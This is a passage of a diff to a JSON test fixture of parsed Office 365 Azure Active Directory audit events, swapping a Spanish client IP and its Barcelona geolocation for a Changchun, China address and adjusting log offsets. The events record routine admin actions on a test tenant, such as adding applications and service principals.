+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -9119,8 +9007,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:30:06.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -9135,7 +9023,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 290993,
+        "log.offset": 290881,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -9164,9 +9052,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:30:06",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -9258,20 +9146,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -9282,8 +9168,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:30:06.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -9298,7 +9184,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 296142,
+        "log.offset": 296028,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -9327,9 +9213,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:30:06",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -9421,20 +9307,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -9445,8 +9329,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:30:06.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -9461,7 +9345,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 301291,
+        "log.offset": 301175,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -9490,9 +9374,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:30:06",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -9584,20 +9468,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -9608,8 +9490,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:30:06.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -9624,7 +9506,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 306440,
+        "log.offset": 306322,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -9653,9 +9535,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:30:06",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -9747,20 +9629,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -9771,8 +9651,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:30:06.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -9787,7 +9667,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 311589,
+        "log.offset": 311469,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -9816,9 +9696,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:30:06",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -9910,20 +9790,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -9934,8 +9812,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:36:30.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -9950,7 +9828,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 316738,
+        "log.offset": 316616,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -9979,9 +9857,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:36:30",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -10063,20 +9941,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -10087,8 +9963,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:36:30.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -10103,7 +9979,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 321131,
+        "log.offset": 321007,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -10132,9 +10008,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:36:30",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -10216,20 +10092,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -10240,8 +10114,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:36:30.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -10256,7 +10130,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 325524,
+        "log.offset": 325398,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -10285,9 +10159,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:36:30",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -10369,20 +10243,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -10393,8 +10265,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:36:30.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -10409,7 +10281,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 329917,
+        "log.offset": 329789,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -10438,9 +10310,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:36:30",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -10522,20 +10394,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -10546,8 +10416,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:36:30.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add owner to application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -10562,7 +10432,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 334310,
+        "log.offset": 334180,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -10591,9 +10461,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:36:30",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -10677,20 +10547,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -10701,8 +10569,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:36:31.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -10717,7 +10585,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 338473,
+        "log.offset": 338341,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -10746,9 +10614,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:36:31",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -10843,20 +10711,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -10867,8 +10733,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:36:31.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -10883,7 +10749,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 343183,
+        "log.offset": 343049,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -10912,9 +10778,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:36:31",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -11009,20 +10875,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -11033,8 +10897,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:36:31.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
